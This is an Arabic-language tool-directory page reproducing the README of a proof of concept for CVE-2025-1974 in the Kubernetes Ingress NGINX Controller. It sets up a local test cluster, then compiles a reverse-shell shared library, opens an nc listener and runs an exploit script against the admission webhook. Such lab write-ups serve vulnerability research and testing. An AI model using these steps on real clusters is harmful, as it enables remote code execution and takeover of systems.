Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-1974 — كود PoC لـ CVE-2025-1974 | Kitploit
أدوات/GitHubGitHub/zulloper/cve-2025-1974
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن السحابة
GitHubzulloper/cve-2025-1974

CVE-2025-1974

كود PoC لـ CVE-2025-1974

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-1974: تحليل ثغرة Kubernetes Ingress Nginx Controller وإعداد بيئة PoC

بيئة الاختبار

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

إعداد بيئة الاختبار المحلية (M2 MacOS)

قم بتثبيت minikube للاختبار المحلي

minikube start --driver=docker

قم بإعداد ingress-nginx-controller باستخدام الأمر التالي

kubectl apply -f ingress-nginx-controller.yml

إعادة توجيه المنافذ

تحقق من أن الـ Pods تعمل بشكل صحيح

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

قم بإعادة توجيه منفذي 80 و8443 (webhook) الخاصين بالـ Pods إلى المنفذين المحليين 8888 و1337 (يلزم إعادة توجيه المنفذين 80 و8443 معًا)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

تحضير so (مكتبة الكائنات المشتركة)

قم بتعديل IP والمنفذ اللذين يتصل بهما الـ reverse shell في ملف rev_shell.c

يلزم الترجمة في بيئة MacOS (arm64)، ويجب أن تكون الترجمة مناسبةً للبيئة التي سيُجرى فيها الاختبار

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

root@kitploit:~
# 크로스컴파일러 설치
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

إنشاء AdmissionReview (اختياري، يمكنك استخدام الملفات المولّدة مسبقًا)

قم بالتحويل إلى صيغة AdmissionReview باستخدام kube-review (json)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

جهّز اتصال الـ reverse shell باستخدام nc

nc -lv 4444

عدّل الـ host والـ port الخاصين بـ nginx وwebhook في ملف exploit.py ثم نفّذ

python3 exploit.py

img.png

تنزيل الأداة